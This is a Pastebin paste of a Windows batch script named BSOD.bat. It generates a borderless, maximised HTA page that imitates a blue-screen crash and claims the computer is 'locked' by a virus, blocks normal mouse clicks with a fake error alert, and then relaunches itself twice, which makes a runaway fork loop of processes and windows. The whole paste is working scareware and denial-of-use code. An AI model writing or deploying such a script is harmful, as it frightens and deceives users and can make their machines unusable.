Advertisement
Guest User

BSOD.bat

a guest
Aug 14th, 2019
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.17 KB | None | 0 0
  1. @echo off
  2.  
  3. (
  4. echo ^<html^>^<head^>^<title^>VMVARE VIRUS VIRUS^</title^>
  5. echo.
  6. echo ^<hta:application id="oBVC"
  7. echo applicationname="BSOD"
  8. echo version="1.0"
  9. echo maximizebutton="no"
  10. echo minimizebutton="no"
  11. echo sysmenu="no"
  12. echo Caption="no"
  13. echo windowstate="maximize"/^>
  14. echo.
  15. echo ^</head^>^<body bgcolor="#000103" scroll="no"^>
  16. echo ^<font face="Lucida Console" size="4" color="white"^>
  17. echo ^<p^>VIRUS BY GHITA PROFESIONAL YOUR COMPUTER WAS LOCKED .^</p^>
  18. echo.
  19. echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^>
  20. echo.
  21. echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^>
  22. echo.
  23. echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^>
  24. echo.
  25. echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^>
  26. echo.
  27. echo ^<p^>Technical information:^</p^>
  28. echo.
  29. echo ^<p^>*** STOP: 0x00D1 ^(0x00C,0x002,0x00,0xF86B5A89^)^</p^>
  30. echo.
  31. echo.
  32. echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^>
  33. echo.
  34. echo ^<p^>Beginning dump of physical memory^</p^>
  35. echo ^<p^>Physical memory dump complete.^</p^>
  36. echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^>
  37. echo.
  38. echo.
  39. echo ^</font^>
  40. echo ^</body^>
  41. echo.
  42. echo ^<script language="javascript"^>
  43. echo function noClick^(^) {
  44. echo if ^(^(event.button==1^)^|^|^(event.button==2^)^) {
  45. echo alert^('Error: 00101100x00100100 missing keymgr.dll'^)
  46. echo }
  47. echo }
  48. echo document.onmousedown=noClick
  49. echo ^</script^>
  50. echo.
  51. echo ^</html^>
  52. ) > bsod.hta
  53.  
  54. start "" /wait "bsod.hta"
  55.  
  56. del /f /q "bsod.hta" > nul
  57. @echo off
  58.  
  59. (
  60. echo ^<html^>^<head^>^<title^>Microsoft Windows^</title^>
  61. echo.
  62. echo ^<hta:application id="oBVC"
  63. echo applicationname="BSOD"
  64. echo version="1.0"
  65. echo maximizebutton="no"
  66. echo minimizebutton="no"
  67. echo sysmenu="no"
  68. echo Caption="no"
  69. echo windowstate="maximize"/^>
  70. echo.
  71. echo ^</head^>^<body bgcolor="#000103" scroll="no"^>
  72. echo ^<font face="Lucida Console" size="4" color="white"^>
  73. echo ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^>
  74. echo.
  75. echo ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^>
  76. echo.
  77. echo ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^>
  78. echo.
  79. echo ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^>
  80. echo.
  81. echo ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^>
  82. echo.
  83. echo ^<p^>Technical information:^</p^>
  84. echo.
  85. echo ^<p^>*** STOP: 0x00D1 ^(0x00C,0x002,0x00,0xF86B5A89^)^</p^>
  86. echo.
  87. echo.
  88. echo ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^>
  89. echo.
  90. echo ^<p^>Beginning dump of physical memory^</p^>
  91. echo ^<p^>Physical memory dump complete.^</p^>
  92. echo ^<p^>Contact your system administrator or technical support group for further assistance.^</p^>
  93. echo.
  94. echo.
  95. echo ^</font^>
  96. echo ^</body^>
  97. echo.
  98. echo ^<script language="javascript"^>
  99. echo function noClick^(^) {
  100. echo if ^(^(event.button==1^)^|^|^(event.button==2^)^) {
  101. echo alert^('Error: 00101100x00100100 missing keymgr.dll'^)
  102. echo }
  103. echo }
  104. echo document.onmousedown=noClick
  105. echo ^</script^>
  106. echo.
  107. echo ^</html^>
  108. ) > bsod.hta
  109.  
  110. start "" /wait "bsod.hta"
  111.  
  112. del /f /q "bsod.hta" > nul
  113. start BSOD.bat
  114. start BSOD.bat
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement